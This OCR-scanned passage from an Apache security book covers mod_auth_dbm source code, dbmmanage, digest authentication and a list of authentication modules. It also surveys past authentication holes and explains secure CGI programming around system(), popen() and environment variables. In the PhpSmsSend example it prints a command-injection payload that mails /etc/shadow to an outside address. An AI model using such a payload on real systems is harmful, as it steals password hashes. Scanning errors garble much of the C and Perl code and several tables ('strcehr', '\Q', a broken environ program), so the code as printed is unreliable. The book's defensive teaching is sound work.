create_dbm_auth_dir_config() sets all the defaults for the session, including setting 
the password and group files to NULL, and the auth_authoritative flag to TRUE: 
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static void *create_dbm_auth_dir_config(apr_pool_t *p, char *d) 


{ 
dbm_auth_config_rec *conf = apr_pcalloc(p, sizeof(*conf)); 
conf->auth_dompwfile = NULL; 
conf->auth_dbmgrpfile = NULL; 
conf ->auth_dbmauthoritative = 1; 
return conf; 
} 


Next, command_rec dbm_auth_cmds[] fills in a command_rec: 


static const command_rec dbm_auth_cmds[] = 
{ 
AP_INIT_TAKE1("AuthDBMUserFile", ap_set_file slot, 
(void *) APR_XtOffsetOf(dbm_auth_config rec, auth_dbmpwfile), 
OR_AUTHCFG, "dbm database file containing user IDs and passwords"), 


AP_INIT_TAKE1("AuthDBMGroupFile", ap_set_file_slot, 

(void *) APR_XtOffsetOf(dbm_auth_config_rec, auth_dbmgrpfile), 
OR_AUTHCFG, "dbm database file containing group names 
and member user IDs"), 

AP_INIT_TAKE12("AuthUserFile", set_dbm_slot, 

(void *) APR_XtOffsetOf(dbm_auth_config_rec, auth_dbmpwfile) , 
OR_AUTHCFG, NULL), 


AP_INIT_TAKE12("AuthGroupFile", set_dbm_slot, 
(void *) APR_XtOffsetOf(dbm_auth config rec, auth _dbmgrpfile), 
OR_AUTHCFG, NULL), 


AP_INIT_FLAG("AuthDBMAuthoritative", ap_set_flag_ slot, 
(void *) APR_XtOffsetOf(dom_auth_config rec, auth_dbmauthoritative) , 


OR_AUTHCFG, "Set to 'no' to allow access control to be passed 
along to lower modules, if the UserID is not known in this module"), 
{NULL} 


J 


get_dbm_pw() gets the password: 


static char *get_dbm_pw(request_rec *r, char 
=žuser, char *auth_dbmpwfile) 


{ 
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DBM *f; 
datum d, q; 
char *pw = NULL; 
#ifdef AP_AUTH DBM _USE_APR 
apr_status_t retval; 
#endif 
q.dptr = user; 
#ifndef NETSCAPE _DBM_COMPAT 


q.dsize = strlen(q.dptr) ; 
#else 

q.dsize = strlen(q.dptr) + 1; 
#endif 


#ifdef AP_AUTH DBM _USE_APR 
if (!(retval = dbm_open(&f, auth_dbmpwfile, 
APR DBM READONLY, APR_OS DEFAULT, r->pool))) { 
ap_log_rerror(APLOG_MARK, APLOG_ERR, retval, r, 
"could not open sdbm auth file: %s", auth_dbmpwfile) ; 
return NULL; 
} 
if (dbm_fetch(f, q, &d) == APR_SUCCESS) 
/* sorry for the obscurity ... falls through to the 
* if (d.dptr) { block ... 
* 
#else 
if (!(f = dom_open(auth_dbmpwfile, O RDONLY, 0664))) { 
ap_log_rerror(APLOG_MARK, APLOG_ERR, errno, r, 
"could not open dbm auth file: %s", auth_dbmpwfile) ; 
return NULL; 
} 
d = dbm_fetch(f, q); 
#endif 
if (d.dptr) { 
pw = apr_palloc(r->pool, d.dsize + 1); 
strncpy(pw, d.dptr, d.dsize); 
pw[d.dsize] = '\Q'; /* Terminate the string */ 
} 
dbm_close(f); 
return pw; 
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get_dbm_grp() gets the group information: 


static char *get_dbm_grp(request_rec *r, char 
™*user, char *auth_dbmgrpfile) 


{ 
char *grp_data = get_dbm_pw(r, user, auth_dbmgrpfile) ; 
char *grp_colon; 
char *grp_colon2; 
if (grp_data == NULL) 
return NULL; 
if ((grp_colon = strchr(grp_data, ':')) != NULL) { 
grp_colon2 = strcehr(++grp_colon, ':'); 
if (grp_colon2) 
*grp_colon2 = '\0'; 
return grp_colon; 
} 
return grp_data; 
} 


Next, dbm_authenticate_basic_user() does the basic user authentication (which 
might not necessarily grant the user access to all directories): 


static int dbm_authenticate_basic_user(request_rec *r) 
{ 
dbm_auth_config_rec *conf = ap_get_module config 
™(r->per_dir_config, 
&auth_dom_module) ; 

const char *sent_pw; 

char *real_pw, *colon_pw; 

apr_status_t invalid_pw; 

int res; 
if ((res = ap_get_basic_auth_pw(r, &sent_pw)) ) 
return res; 


if (!conf->auth_dbmpwfile) 
return DECLINED; 


if (!(real_pw = get_dbm_pw(r, r->user, conf->auth_dompwfile))) { 
if (!(conf->auth_dbmauthoritative) ) 
return DECLINED; 

ap_log_rerror(APLOG_MARK, APLOG_NOERRNO|APLOG_ERR, 0, r, 
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"DBM user %s not found: %s", r->user, r->filename) ; 
ap_note_basic_auth_failure(r); 
return HTTP_UNAUTHORIZED; 
} 
/* Password is up to first : if exists */ 
colon_pw = strchr(real_pw, ':'); 
if (colon_pw) { 
*colon_pw = '\Q'; 
} 
invalid_pw = apr_password_validate(sent_pw, real_pw); 
if (invalid_pw != APR SUCCESS) { 





ap_log_rerror(APLOG MARK, APLOG NOERRNO|APLOG ERR, 0, r, 


"DBM user %s: authentication failure for \"%s\": 
"Password Mismatch", 
r->user, r->uri); 
ap_note_ basic auth failure(r); 
return HTTP_UNAUTHORIZED; 
} 
return OK; 


} 





Managing DBM Files: dbmmanage 


dbmmanage is a utility for creating and updating DBM format files that store user- 
names and password for HTTP Basic authentication. Table 11.2 summarizes dbmman - 


age’s syntax and options. 


TABLE 11.2 dbmmanage Options 





Tool Description 

add Adds a username entry to the DBM file. 

adduser Gets a password and adds an entry (username/password). 

check Gets a password and checks if the specified username is in the DBM database. 

delete Gives the specified username the boot. 

filename The DBM filename. 

import Reads username/password pairs (colon-delimited) from STDIN and adds them to 
the database. (Be sure that you shotgun only those records where the password 
is already crypted, such as those that come from a standard, Basic authentica- 
tion .htpasswd file). 

update Like adduser but ensures that the specified username already exists. 

username The specified username. 

view This dumps the DMB file’s contents to STDOUT. 
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The syntax is 


dbmmanage filename [command] [username] [passwd] 


Using DBM Authentication 


The chief benefit of DBM-based authentication is its speed. Plain-text storage is okay 
if you have, say, only 100 users. However, if you have thousands, Apache must 
traverse all that data procedurally and thus, it will move slowly. Therefore, because 
speed is often critical (users are notoriously impatient) DBM-style storage is prefer- 
able. 


DBM schemes use a simple but effective system: They base their search on a 
key/value pair, split the key (username) and password into parts, and therefore create 
two files. For example, if your database name was myusers, it would create two files: 


e myusers.pag 


e myusers.dir 


To use the DBM system, though, you must first load the module. To do so, uncom- 
ment this line in httpd.conf: 


# Module dbm_auth_module mod_auth_dbm.o 


After you do, restart Apache. 
Next, issue the following command (substituting your desired values): 


dbmmanage /db-directory/myusers adduser hacker slour7*UN 


Here, dbmmanage creates the database myusers in whatever directory you specify (in 
this case, /db-directory/) and adds a user with the username hacker and the pass- 
word slour7*UN. 


NOTE 


Note that dbmmanage might not be in a directory in your default path. In most distributions, 
it’s in /usr/bin/dbmmanage, but on your system, it could be somewhere else. If you get a 
command not found, try looking for it (wnere, whereis, and so on). 





Then, add the following information to your access file: 


AuthName "Restricted Area" 

AuthType Basic 

AuthDBMUserFile /db-directory/myusers 
require valid-user 
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HTTP and Cryptographic Authentication 


Currently, above and beyond Basic and DBM-type authentication, Apache supports 
digest-based cryptographic authentication using MD5. MDS belongs to a family of 
one-way hash functions called message digest algorithms and was originally defined in 
RFC 1321: 


The algorithm [MD5] takes as input a message of arbitrary length and produces as output a 
128-bit “fingerprint” or “message digest” of the input. It is conjectured that it is computation- 
ally infeasible to produce two messages having the same message digest, or to produce any 
message having a given prespecified target message digest. The MD5 algorithm is intended 
for digital signature applications, where a large file must be “compressed” in a secure manner 
before being encrypted with a private (secret) key under a public-key cryptosystem such 

as RSA. 


NOTE 
RFC 1321 is located at ftp://ftp.isi.edu/in-notes/rfc1321.txt. 





MDS has been most often used to ascertain file integrity (or whether someone has 
tampered with files). When you run a file through MDS, the fingerprint emerges as a 
unique 32-bit value, like this: 


2d50b2bf fb537cc4e637dd1 f07a187F4 
Many Unix software distribution sites use MDS to generate digital fingerprints for 


their distributions. As you browse their directories, you can examine the original 
digital fingerprint of each file. A typical directory listing would look like this: 





D5 (wn-1.17.8.tar.gz) = 2f52aaddidefedadSbad91da8efc0f980 
D5 (wn-1.17.7.tar.gz) = b92916d83377b143360f 068df6d8116 
D5 (wn-1.17.6.tar.gz) = 18d02b9f24a49dee239a78ecfaf9cbfa 
D5 (wn-1.17.5.tar.gz) = Ocf8f8d0145bb7678abcc518fOcb39e9 
D5 (wn-1.17.4.tar.gz) = 4afe7c522ebe0377269da0c7f26ef 6b8 
D5 (wn-1.17.3.tar.gz) = aaf3c2b1c4eaa3ebb37e8227e3327856 
D5 (wn-1.17.2.tar.gz) = 9b29eaa366d4f4dc6de6489e1 e844fb9 
D5 (wn-1.17.1.tar.gz) = 91759da54792Ff1cab743a034542107d0 
D5 (wn-1.17.0.tar.gz) = 32f6eb7f69b4bdc64a163bf744923b41 


If you download a file from such a server and later determine that the digital finger- 
print differs from its reported original, something is amiss. 
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Because MDS offers high assurance, developers have incorporated it into many 
network applications. (MDS authentication over HTTP has actually been available 
since NCSA httpd was the prevailing Web server.) Let’s look at MDS digest authenti- 
cation now. 


Adding MDS Digest Authentication 


You can add MDS authentication using the htdigest tool. htdigest works in a 
similar fashion as htpasswd. To create a new digest database (.htdigest) issue the 
following command: 


htdigest -c .htdigest [realm] [username] 


NOTE 


The realm variable is your AuthName from .htpasswd. 





Next, edit .htacess and specify .htdigest’s location: 


AuthUserFile /home/Nicole/public_htm1/.htpasswd 
AuthGroupFile /home/Nicole/public_html/.htgroup 
AuthDigestFile /home/Nicole/public_html/.htdigest 
AuthName Nicole 

AuthType Basic 


<Limit GET POST> 
require user nicole 
</Limit> 


And finally, specify the new authentication type: 


AuthUserFile /home/Nicole/public_htm1/.htpasswd 
AuthGroupFile /home/Nicole/public_html/.htgroup 
AuthDigestFile /home/Nicole/public_html/.htdigest 
AuthName Nicole 

AuthType Digest 


<Limit GET POST> 
require user nicole 
</Limit> 


After you complete these steps, all further authentications will be digest-based. This 
will at least ensure that even if attackers come armed with sniffers, they won’t be 
able to harvest any passwords. 
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NOTE 


One drawback of MD5 authentication is that not every client supports it. However, this is a 
minor concern because though more than 50 eclectic browsers exist, most users stick to 


mainstream products. 


SSL-Based Authentication 


If you want even further assurance, you might consider SSL-based authentication. 
This is where you issue SSL client certificates to your users. They, in turn, install 
these in their browser (the procedure differs depending on the browser type). 


Other Tools for Extending Apache’s Authentication 


Perhaps you prefer methods other than those Apache natively provides. No problem; 
many other types exist. Table 11.3 lists quite a few. 


TABLE 11.3 Tools to Extend Apache's Authentication Schemes 








Tool Description 

auth_ip This module from Tullio Andreatta provides user authentication by 
client IP address. Get it here: 
http://www. troppoavanti.it//modules/mod_auth_ip/mod_auth_ip. 
html. 

auth_ldap This module from Dave Carrigan (which requires Netscape SDK or 


auth_oracle_module 


inst_auth_module 


Kerberos Authentication 


MD5 Cookie 


mod_auth_external 


OpenLDAP) provides LDAP-based authentication. Get it here: 

http: //www.rudedog.org/auth_ldap/. 

This module from Serg Oskin provides authentication for Apache 1.3, 
Oracle8 (it requires the Oracle8 client). Get it here: 

http: //www.macomnet.ru/~oskin/mod_auth_oracle.html. 

From Clifford Wolf, this GPL module provides instant-password 
authentication. Get it here: 

http: //ww.clifford.at/stuff/mod_auth_inst.c. 

From Daniel Henninger, this suite (which requires Kerberos 4 or 5 
libraries) does Kerberos authentication for mutual tkt or 
principal/passwd. Get it here: 

http: //stonecold.unity.ncsu.edu/software/mod_auth_kerb/. 
This tool from Heinz Richter provides authentication via Realms for 
document tree and fast login for users using MD5 signed cookies. Get 
it here: http://www. frogdot.org. 

This module from Nathan Neulinger Authenticates using user-provided 
function/script (secure authentication from Unix). Get it at 

http: //www.unixpapa.com/mod_auth_external.html. 
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Tool 


Description 





mod_auth_mysql 


mod_auth_nds 


mod_auth_notes 


mod_auth_nt 


mod_auth_ora7 


mod_auth_ora8s 


mod_auth_oracle/win32 


mod_auth_radius 


mod_auth_radius 


mod_auth_samba 


mod_auth_sys 


mod_auth_tacacs 


mod_auth_tds 


This module from Vivek Khera (and requires Apache 1.3.4+ and mysql 
3.23+) provides MySQL authentication (works with DSO). Get it here: 
ftp: //ftp.kciLink.com/pub/. 

This module from Philip R. Wilson (and requires Linux and ncpfs) 
provides NDS authentication through Apache. Get it here: 

http: //www.users.drew. edu/~pwilson. 

This module from Guillermo Payet (which requires Lotus Notes) does 
user authentication with Notes. Get it here: http: //www.ocean- 
group.com/download.html. 

From Alvydas Gelzinis, this module does Windows NT (Win32) authen- 
tication via NT users and groups. Get it here: 

http: //ww.kada.1t/alv/apache/mod_auth_nt. 

This module from Ben Reser (which requires Oracle 7 and Apache 
1.2+) provides authentication through an Oracle database. Get it here: 
http://ben.reser.org/mod_auth_ora/. 

This module from Ben Reser (which requires Oracle 8 and Apache 
1.3+) provides authentication through an Oracle database. Get it here: 
http://ben.reser.org/mod_auth_ora/ . 

This module from Karsten Pawlik and Serg Oskin (which requires 
Oracle 8 and Apache 1.3.x+) provides authentication against a 
Oracle8.x.x-Database—for Apache 1.3.x with and without mod_ss1 
(for Win32 only). Get it here: 

http: //www.designlab.de/service_support/downloads/down- 
loads/mod_auth_oracle.zip. 

This module from Alan DeKok and Jan Wedekind provides RADIUS 
authentication (Redundant Servers, Directory config). Get it here: 
http: //www.wede.de/sw/mod_auth_radius/. 

This module from Alan DeKok provides RADIUS authentication. Get it 
here: http://www. freeradius.org/mod_auth_radius/. 

From Juha Ylitalo, this module (which requires pam_smb), provides 
Samba authentication. Get it at 

http: //sourceforge.net/projects/modauthsamba/. 

This module from Franz Vinzenz (which requires Apache 1.0+) 
provides Basic authentication using system accounts. Get it here: 
http: //www.ntb.ch/Pubs/mod_auth_sys.c. 

This module from Roman Volkoff provides TACACS+ authentication. 
Get it here: http: //sourceforge.net/projects/mod-auth-tacacs/. 
This module from lan C. Charnas (which requires the FreeTDS library), 
provides TDS authentication (works with MSSQL and SYBASE). Get it 
at http: //freshmeat.net/projects/mod_auth_tds/?topic_id=250. 
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TABLE 11.3 Continued 


Tool Description 





mod_auth_yp This module from lan Prideaux offers authentication via yellow pages 
(NIS). Get it here: 
http: //ww.amtrak.co.uk/ApacheModules/mod_auth_yp.c. 

mod_bakery This module from Michael Link (which requires MySQL) does 
Encrypted cookie access checking and user personalization and 
authentication. (Good name, right?) Get it here: 
http://www. fractal.net/mod_bakery.tm. 

mod_LDAPauth This module from Piet Ruyssinck (which requires LDAP libraries and 
includes), provides authentication through user information stored in 
an LDAP directory. Get it at 
http: //diamond.rug.ac.be/mod_LDAPauth/ index. shtml. 

mod_ntlm This module from Andreas Gal (which requires Apache 1.3.x+) 
provides NTLM authentication for Apache/Unix. Get it here: 
http://modntlm.sourceforge.net/. 

mod_secureid This module from Patrick Asty (which requires Apache 1.3.x+) provides 
SecurlD authentication through Apache. Get it here: 
http: //www.deny-all.com/mod_securid/. 

mod_ticket This module from Justin Wells (which requires Apache 1.3+) provides 
authentication via digitally signed tickets at the base of a URL 
(session/cookie data) and allows passing authenticated traffic from site 
to site. Get it here: http: //germ.semiotek.com/ticket. 

PAM Auth This module from Ingo Liitkebohle (which requires 1ibpam) offers 
authentication for Pluggable Authentication Modules. Get it here: 
http: //pam.sourceforge.net/mod_auth_pam/. 





Holes in Apache Authentication: Historical Perspective 


Holes in Apache-based authentication modules sometimes crop up, and by highlight- 
ing a few here, I hope to impart the types of problems that can develop. This will 
clue you in on what to watch for when you use third-party modules. 


Before we start, however, note that not every hole is really a hole per se, but rather 
some stem from Web administrators expecting more from modules than those 
modules can actually do. This was the case with our first example. 


On or about November 7, 2001, David Endler reported a flaw in mod_user_track. 
mod_user_track provides tracking of user preferences and behavior through cookies. 
The problem was that session IDs generated by mod_user_track consisted of a 
client’s IP, the system time, and the server PID; hence, these values weren’t random, 
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anyone could generate them or use them to impersonate other users. The easy solu- 
tion was simply not to build applications that rely on these values. 


NOTE 


To learn more about this problem, how attackers could exploit it, and its bottom-line signifi- 
cance, check out Engle’s paper “Brute-Forcing Web Session IDs.” Get it here: 
http: //www.idefense.com/papers.html. 





A more “pure” hole emerged in September 2001, in mod_auth_oracle. As Florian 
Weimer of RUS-CERT (University of Stuttgart) demonstrated, mod_auth_oracle, an 
authentication module from Serg Oskin that offers database-based authentication 
using Oracle, had a serious flaw. Affected versions (0.5.1 with Apache and various 
Oracle versions, including 8 and 9) allowed remote attackers to send SQL commands 
and, in limited circumstances, alter tables. 


The problem arose because the module didn’t account for attackers inserting escape 
strings. That is, attackers could send additional commands within queries by preced- 
ing them with a semicolon and a single quote. Weimer developed a temporary solu- 
tion that nicely highlights how the problem arose. His document is titled “Escaping 
Strings in SQL Queries.” Get it at http: //cert.uni- 
stuttgart.de/doc/postgresql/escape/. 


NOTE 


Florian also identified similar weaknesses in mod_auth_pgsql, mod_auth_pgsql_sys, 
mod_auth_pg, and mod_auth_mysql. Read his paper on those vulnerabilities here: 
http://cert.uni-stuttgart.de/advisories/apache_auth.php. 





mod_auth_digest also manifested a bug wherein when a query string appears in the 
URI (with JSP, for example) the module chokes and reports a bad request. To learn 
more about that, see Apache bug report #7603, located here: 

http: //bugs.apache.org/index.cgi/full/7063. 


Summary 


At this stage, after adding authorized users, your system should be fairly secure 
(notwithstanding SSL, which we'll look at in Chapter 15) and thus, you'll next want 
to add functionality. Chances are, this will involve some form of custom program- 
ming. The next two chapters deal with programming from a security perspective. 


1 2 IN THIS CHAPTER 


e Apache Language Support 


lacing Secure Code: e What Is Server-Side 
Apache at Server Side eae 


e General CGI Security Issues 


e Spawning Shells 


Eves if you deploy Apache’s best security features and e Buffer Overruns 

incorporate authentication, attackers can still breach your 

security. Perhaps the most prevalent mistakes Webmasters e Paths, Directories, and Files 

make today are not in how they configure Apache, but e PHP 

instead in common programming errors on the server side 

(or errors hiding in third-party packages located on the e Interesting Security 

server side). This chapter looks at those issues. Programming and Testing 
Tools 

Apache Language Support e Other Online Resources 


Apache doesn’t explicitly support any particular language 
other than C, which Apache itself is written in, at least not 
in the conventional sense. Rather, it supports Common 
Gateway Interface (CGI) and related types of program- 
ming. These come in many flavors, APIs, and technologies. 


Here are a few: 
e ASP 
e awk 
e BASIC (yes, BASIC) 
e C 
e C++ 
e COBOLScript (don’t laugh) 
e ColdFusion 


e Flash 
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e ISAPI 

e Java 

e JSP 

e Perl 

e PHP 

e Python 

e Tcl 

e The shells (ash, bash, zsh, bash, csh, tcsh, ksh, and so on) 


e XML 


Through native functions/modules or third-party modules, Apache supports these 
technologies and many more. Your choices, therefore, are limited only by your tech- 
nological skill and your imagination’s confines. 


What Is Server-Side Programming? 


Server-side programming is a fifty-cent term that describes the authoring and use of 
code that resides on and is executed by the server. You design such code expressly to 
execute on Apache’s signal and return data (if it in fact returns data) to a Web client. 


Search engines, mailing lists, discussion boards, application servers, and many other 
systems rely on server-side programming. However, to be fair, those same systems 
typically support at least nominal client-side code, too, chiefly through JavaScript, 
Jscript, and VBScript. 


Server-side programming most often involves Web-to-database and database-to-Web 
interaction of some kind, and frequently deploys several technologies in concert. 


Some typical combinations: 
e C, C++, or ASP to ISAPI to SQLServer 
e JSP to Oracle App Server to Oracle 
e Perl through DBI to a SQL server 
e PHP to Apache to MySQL 
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NOTE 

Any of the aforementioned combinations might also involve client-side JavaScript, Jscript, or 
VBScript for display purposes, or to catch and carry variables (an unadvisable practice, but 
something folks frequently do). 


For our purposes here, these methods fall under the sweeping category of CGI. 


General CGI Security Issues 


On every Web development project, you’ll face three chief risks, and these risks 
manifest in logical sequence, from your project’s beginnings to its ultimate 
completion: 


e Faulty tools—You must keep up with the times and obtain the latest tools. 
Languages and libraries are carefully scrutinized, but security issues within 
them surface periodically. If your tools are flawed, even your best efforts will 
fail. 


e Flawed code—Even if you have flawless tools, you must know how to properly 
use them. Some programming languages enforce strict guidelines whereas 
others don’t (C as opposed to Perl, for example), but most employ only cursory 
security checks on your code—if any at all. That means that you (and not the 
compiler or interpreter) are ultimately responsible for ensuring that your code 
enhances (or at worst, does not impede or degrade) system security. 


e Environment—Even if you use flawless tools and employ them properly, unex- 
pected contingencies can arise. Environment is a good example. Attackers or 
even coworkers can maliciously or unwittingly alter the environment, and by 
doing so, materially alter your program’s execution and performance. 


The best advice, therefore, is to choose one language, learn it well, and stay current 
on all security issues relevant to it. Beyond that, this chapter covers some common 
programming errors, means of avoiding them, and tools to help you in that regard. 


Spawning Shells 


Several functions spawn shells or otherwise execute programs: 
e system() 
e popen() 


e open() 
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e eval 


e exec 
Avoid these functions in CGI. The following sections illustrate why. 


Executing Shell Commands with system() 


Two risky programming practices are 
e Constructing internal command lines using user input 


e Executing shell commands from within C, PHP, or Perl 


Programmers often perform these tasks using the system() function. system() is 
available via the standard library (stdlib.h) and provides a mechanism to execute a 
shell command from a C or C++ program. As explained in the system() Section (3) 
man page: 


system() executes a command specified in string by calling /bin/sh -c string, and returns 


after the command has been completed. 


Do not use system() in the following: 
e Publicly accessible programs, or scripts on your Web host 
e SGID programs or scripts 


e SUID programs or scripts 


Here’s why: Attackers can execute shell commands by piggybacking your system() 
call, either by manipulating environment variables or pushing metacharacters or 
additional commands onto the argument list. 


In particular, you should always avoid giving attackers an opportunity to pass 
metacharacters to any function that calls a shell. Table 12.1 lists common metachar- 
acters in various shells. 


TABLE 12.1 Various Metacharacters in bash, csh, and ksh 








Purpose bash csh ksh 
Append output to a file >> >> >> 
Append STDERR and STDOUT N/A >>& >& 


Command separator ; : ; 
Command substitution 
Execute in background & & & 
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TABLE 12.1 Continued 





Purpose bash csh ksh 
Group commands (=) () () 
History substitution \[job #] ![job #] %[job #] 
Home directory symbol l~ l~ ~ 


Literal (but not $ or /) ET Baag" igp" 
Literal quote nan uaa 


Logical AND && && && 
Logical OR || || || 
Match multiple characters * 7 7 
Match a single character ? ? ? 
Match multiple characters Deca] [saal [eaten] 
Path break symbol / / / 
Pipe | | | 
Redirect input to a line << << << 
Redirect input < < > 
Redirect output > > > 
Redirect STDERR and STDOUT 2> >& N/A 
Variable substitution ${...} $ ${...} 





system(), by the way, is available in one form or another in all full-fledged 
languages. To appreciate the danger of this, consider the PHP-base application 
PhpSmsSend. As described in its documentation 

(http: //freshmeat.net/projects/phpsmssend/), PhpSmsSend is 


...a frontend to the SmsSend application. It consists of a .php file, from which you select one 
of the available scripts, and then you can send an SMS wherever you want, all around the 


world. 


No one would question that PhpSmsSend is a useful application. Short Message 
Service to GSM mobile phones is one popular way to exploit new telephone technol- 
ogy and incorporate it with the Web. However, in late January 2002, independent 
researcher Indra Kusuma demonstrated that PhpSmsSend had a critical hole. 


The offending code was 

$str = SMSSEND." ".SCRIPTSPATH.$script." $params -- -d @ ".PROXY; 
system($str,$res) ; 

Attackers who sent commands enclosed in backticks could execute any command 


that the host server supported. For example 


cat /etc/shadow | mail samshacker@samspublishing.com 
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NOTE 


system() can be attacked in other ways, too. On some systems, local attackers can alter the 
Input Field Separator shell variable to break up paths in your system() function into separate 
commands. 


In Perl, system() is even more dangerous, because Perl slurps up additional 
commands ad infinitum, even when these are separated by white space. For this 
reason, you should never build a command line with user input for handling by 
system(). 


This is so even if you think you’ve found a solution to control what gets read into 
STDIN. For example, some Webmasters present the user with check boxes, radio lists, 
or other read-only clickable elements that have predefined values. This isn’t safe, 
either. Nothing prevents a cracker from downloading the HTML source code, altering 
the predefined values, and submitting the form. 


popen() in C and C++ 


popen() is available via the standard I/O library (stdio.h) and provides a mechanism 
to execute a shell command from a C or C++ program. As explained in the popen 
Section 3 man page: 


The popen function opens a process by creating a pipe, forking, and invoking the shell. As a 
pipe is by definition unidirectional, the type argument might specify only reading or writing, 
not both; the resulting stream is correspondingly read-only or write-only. The command argu- 
ment is a pointer to a null-terminated string containing a shell command line. This command 


is passed to /bin/sh using the -c flag; interpretation, if any, is performed by the shell. 


Do not use popen() in the following: 
e Publicly accessible programs or scripts on your Web host 
e SGID programs or scripts 


e SUID programs or scripts 


popen() invites various attacks, the most serious of which is that attackers can use 
metacharacters to trick popen() into invoking alternate commands. This problem 
crops up more often than you'd think, even in professionally developed applications. 
For example, a historical RSI Advise team report described an IRIX vulnerability to 
BUGTRAQ about autofsd: 


autofsd is an RPC server which answers file system mount and umount requests from the 


autofs file system. It uses local files or name service maps to locate file systems to be 
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mounted. Upon receiving a map argument from a client, the server will attempt to verify if it 
is executable or not. If autofsd determines the map has an executable flag, the server will 
append the client’s key and attempt to execute it. By sending a map name that is executable 
on the server, and a key beginning with a semicolon or a newline followed by a command, 
unprivileged users can execute arbitrary commands as the superuser. The problem occurs 
when the server appends the key to the map and attempts to execute it by calling popen(). 
Because popen() executes the map and key you specify by invoking a shell, it is possible to 
force it into executing commands that were not meant to be executed. (RSI.0010.10-21- 
98.IRIX.AUTOFSD, http: //geek-girl.com/bugtraq/1998 4/0142.htm1) 


Also, like system(), popen() is vulnerable to environment variable attacks. Local 
attackers might be able to pass commands to the shell or launch malicious programs 
by altering the Input Field Separator, $HOME, and $PATH environment variables. 


To foil such attacks, you can access, manipulate, and hard-code shell environment 
variables from C with the following functions, all available from the standard library 
(stdlib.h): 


e getenv()—Use getenv() to get an environment variable. 
e putenv()—Use putenv() to either change or add an environment variable. 


e setenv()—Use setenv() to either change or add an environment variable. 


Just how hardcore an approach to take on environment variables is debatable, but 
remember that your C program inherits its environment variables from the shell by 
which it was executed. By not specifying sensitive variables, you can inadvertently 
allow attackers to materially affect your program’s execution. (Gene Spafford and 
Simson Garfinkel, authors of Web Security and Commerce, recommend cleaning the 
environment completely and explicitly creating a new one.) 


Table 12.2 describes important shell variables and what they represent. 


TABLE 12.2 bash Environment Variables and What They Mean 








Variable Purpose 

$- Stores the current shell’s flags. 

$! Stores the PID of the last command executed in the background. 

$# Stores the number of positional parameters ($1, $2, $3, and so on). 

$$ Stores the PID of the current shell. 

$0 Stores the name of the program currently being executed. 

$CDPATH Identifies the search path used when you issue the cd (change directory) 
command. 


$HOME Identifies the location of your home directory. 
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TABLE 12.2 Continued 

Variable Purpose 

$IFS The Internal Field Separator stores the character used for field separation. 

$LIBPATH Identifies the search path for shared libraries. 

$LOGNAME Stores your username. 

$MAIL Stores the location of your mailbox. (From this, the shell knows where to find 
your mail.) 

$PATH Stores a list of all directories the shell will search when looking for commands. 

$PS1 Identifies what your system prompt will look like. For example, on my 
machine, the PS1 variable is set to $. 

$SHACCT Stores a filename (a file which is writable by the current user) that stores an 
accounting record of all shell procedures. 

$SHELL Stores the shell’s path. 

$TERM Identifies the current terminal type. Your terminal type can be very important. 
Unix uses this to determine how many characters and lines to display per 
screen. 

$TIMEOUT Stores the number of minutes of inactivity before the shell exits. 

$TZ Identifies the current time zone. 





From C, you can access the total environment (all variables currently set) using 
environ. As explained in the environ (5) man page: 


An array of strings called the ‘environment’ is made available by exec(2) when a process 


begins. By convention these strings have the form 'name=value'. 


In the Unix Programming FAQ, Andrew Gierth offers a sample program that grabs all 
currently set environment variables and prints them out (similar to printenv and 
env) using environ: 


#include <stdio.h> 


extern char * 

int main() 

{ 
char **ep 
char *p; 
while ((p 

print 

return 0; 


*environ; 


= environ; 


= *eptt)) 
f("%s\n", p); 
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In Perl, hard-code your environment variables at the top before processing data like 
this: 


$SENV{"HOME"} = ‘your_desired_home' ; 
$ENV{"PATH"} = ‘your_desired_path'; 
SENV{"IFS"} = ''; 


Failure to specify environment variables (or check their length) can result in C/C++ 
buffer overflows. Consider UnixWare 7, for example. In February 2002, a researcher 
going by the handle JeGalGhongMyeung alerted the security community to a serious 
hole in the Caldera UnixWare Message Catalog. 


As per Caldera’s advisory, available for download at 
ftp://stage.caldera.com/pub/security/unixware/CSSA-2002-SCO.3/erg711179.Z: 


The library functions that manipulated message catalogs could be subverted via environment 
variables to use a user’s own message catalogs, possibly causing a set{uid,gid} program to 


memory fault, allowing the possibility of a privilege escalation vulnerability. 


Some other examples: 


e SAS SASTCPD, February 2002—sastcpd (which installed itself suid root, or set 
user ID root) passed unfiltered environment variables directly to an execve call. 
Attackers could exploit this to execute commands. 


e Chinput input character system for Linux, February 2002—Attackers could 
shotgun the system with an exceptionally long $HOME environment variable 
string. This caused a buffer overflow (and Chinput is suid root). 


e IMLib2, January 2002—Imlib2, a Linux/Unix graphics library, was linked to 
many setuid programs. If attackers flooded $HOME with unusual large strings 
(greater than 4,128 characters), a buffer overflow ensued. 


e OpenSSH, December 2001—If attackers created a bogus local library, they could 
flush its value/location into LD_PRELOAD, and OpenSSH would load it. This led 
to root access. 


e Oracle DBSNMP, August 2001—Attackers could overflow $ORACLE_HOME, leading 
to administrative access. Although this bug is old, many folks still use Oracle 8 
and have no idea that this problem exists. 


Many vendors and developers aren’t aware of such holes, and even when they 
become aware of them, they often take considerable time to correct them. In this 
respect—incredibly—you'll often see a better and quicker response from smaller firms 
than from larger ones. If someone finds a hole in your software, fix the problem 
immediately (and graciously thank them for bringing it to your attention). 
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One example of an appropriate response came from Stephane Daury on Net juke. 
Netjuke is a Web-based audio streaming jukebox powered by PHP 4, and handles 
MP3, Ogg Vorbis, and other digital music formats. It also supports language packs 
(English, French), multilevel security, shared and private play lists, random play lists, 
images, and so on. 


In early February 2002, independent researchers demonstrated that remote attackers 
could flood the variable $section and by doing so, execute arbitrary commands on 
the target system. On being notified, Daury fixed the problem just 30 minutes later. 


open() 
open() is a native Perl function that opens files. As explained in the Perl perlfunc 
documentation, open() 


...opens the file whose filename is given by EXPR, and associates it with FILEHANDLE. If FILE - 


HANDLE is an expression, its value is used as the name of the real filehandle wanted. 


However, you can also use open() to open a process (a command): 


If you open a pipe on the command -, as in either | - or - |, then there is an implicit fork 
done, and the return value of open is the pid of the child within the parent process, and 0 


within the child process. 


Here’s an example of using open() to open a file for processing: 


open (DATABASE, "mydatabase.txt"); 
while(<DATABASE>) { 
if(/$contents{'search_term'}/gi) { 
$count++; 
@fields=split('\!\:\!', $_); 
print "$fields[1] $fields[2] $fields[3]\n'; 
} 


} 
Close (DATABASE) ; 


Here’s an example of using open() to open a process: 


open(PS, "ps|") || die "Cannot open PS\n\$!"; 
while (<PS>) { 

if(/pppd/) { 

$count++; 

@my_ppp = split(' ', $_); 

kill 1 $my_ppp[Q]; 
